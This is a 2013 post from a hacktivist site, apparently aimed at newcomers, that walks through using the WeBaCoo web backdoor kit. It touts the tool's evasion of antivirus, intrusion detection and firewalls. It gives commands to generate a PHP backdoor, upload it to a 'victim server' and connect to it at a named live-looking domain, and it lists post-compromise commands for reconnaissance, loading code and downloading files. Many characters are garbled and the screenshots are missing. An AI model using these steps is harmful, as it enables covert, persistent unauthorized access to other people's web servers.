CyberGuerrilla 2013
 Vol.3--No.2013 | 2 Users Online
Tuesday,Oct 15,2019 
By ro0ted avatar | May 30, 2013 - 16:09 | Posted in /b/ | Comments Off on #ro0ted #OpNewblood | WeBaCoo (Web Backdoor Cookie)

#ro0ted #OpNewblood | WeBaCoo (Web Backdoor Cookie)

WeBaCoo (Web Backdoor Cookie) is a web backdoor script-kit, aiming to provide a stealth terminal-like connection over HTTP between client and web server. It is a post exploitation tool capable to maintain access to a compromised web server. WeBaCoo was designed to operate under the radar of modern up-to-dated AV, NIDS, IPS, Network Firewalls and Application Firewalls, proving a stealth mechanism to execute system commands to the compromised server. The obfuscated communication is accomplished using HTTP header???s Cookie fields under valid client HTTP requests and relative web server???s responses.

First Download webacoo script from??here??on your desktop

Now unzip the file??unzip webacoo.zip

c4

 

 

Now Type Command:??./webcoo.pl ???g ???o webdoor.php

This will generate code for a backdoor (-g) Generate backdoor code (-o??is required). Here is a screenshot of the command terminal view:

 

nh

 

 

Now upload that file in victim server, after uploading it, copy the URL of your uploaded file. Then type??following command:

. / webacoo.pl -t?? -u http://telecallerjobs.com/webdoor.php

 

4f

 

Ls????? List information about the FILEs (the current directory by default)

 

4ft

 

 

Uname ???a????? print all information

Free????? display information about free and used memory on the system

pwd??– print name of current/working directory

Df ??? ??displays the amount of disk space available on the filesystem containing each file name argument

W????? Displays information about the users currently on the machine, and their processes.

 

fff

 

 

route????? show / manipulate the IP routing table

 

cc

 

 

Load????? Load machine code and initialize new commands.

 

cv

 

 

Download????? Download file from server

 

xx

 

 

Cat????? cat to view the file, we see only the normal text

 

2v0d4s3

 

(Visited 1 times, 1 visits today)


  • You can follow any responses to this entry through the RSS 2.0 feed.
  • Both comments and pings are currently closed.

Comments are closed.

Please note: Comment moderation is enabled and may delay your comment. There is no need to resubmit your comment.

nonymous. Whoever you are, we are ungovernable!
> =[]= This site is run by cyberguerrilla, your friendly anonymous autonomous tech collective since 2010 =[]= This the past that can NOT be changed! <